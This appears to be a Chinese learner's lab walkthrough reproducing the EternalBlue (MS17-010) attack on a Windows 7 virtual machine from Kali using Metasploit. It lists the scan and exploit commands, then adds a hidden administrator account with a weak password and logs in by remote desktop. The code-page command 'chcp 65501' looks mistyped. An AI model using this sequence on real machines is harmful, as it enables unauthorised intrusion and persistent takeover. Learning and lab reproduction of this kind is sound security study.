最近开始学习渗透,永恒之蓝漏洞很出名对此学习记录并且复现
所需环境VMware,两台主机使用NAT模式连接
kali | 192.168.249.129 |
windows7 | 192.168.249.130 |
PING命令测试主机连接情况
当时发现kali单方ping不通win7,排查后需要先关闭win7防火墙
输入命令msfconsole 进入msf框架
命令search ms17-010 寻找ms17-010相关漏洞
这里前两个是辅助模块用来帮助探测主机是否存在该漏洞,后三个是利用模块
输入命令use auxiliary/scanner/smb/smb_ms17_010,show options 查看配置信息
输入命令set rhost 192.168.249.130 探测该目标
1.显示绿色说明该主机存在ms17-010漏洞
2.真实情况下使用命令扫描整个网段或使用nmap扫描
输入命令use exploit/windows/smb/ms17_010_eternalblue选择攻击模块并查看配置
反弹shell,获得权限
输入命令chcp 65501去除乱码
添加用户abc密码abc并把该用户加入用户组Administratos命令如下
net user abc abc /add
net localgroup Administrators abc /add
最后在kali上使用远程连接,命令如下
rdesktop 192.168.249.130
注:Widows 7 默认是不开启远程服务,自己测试时需要先启用远程功能
登录成功,复现结束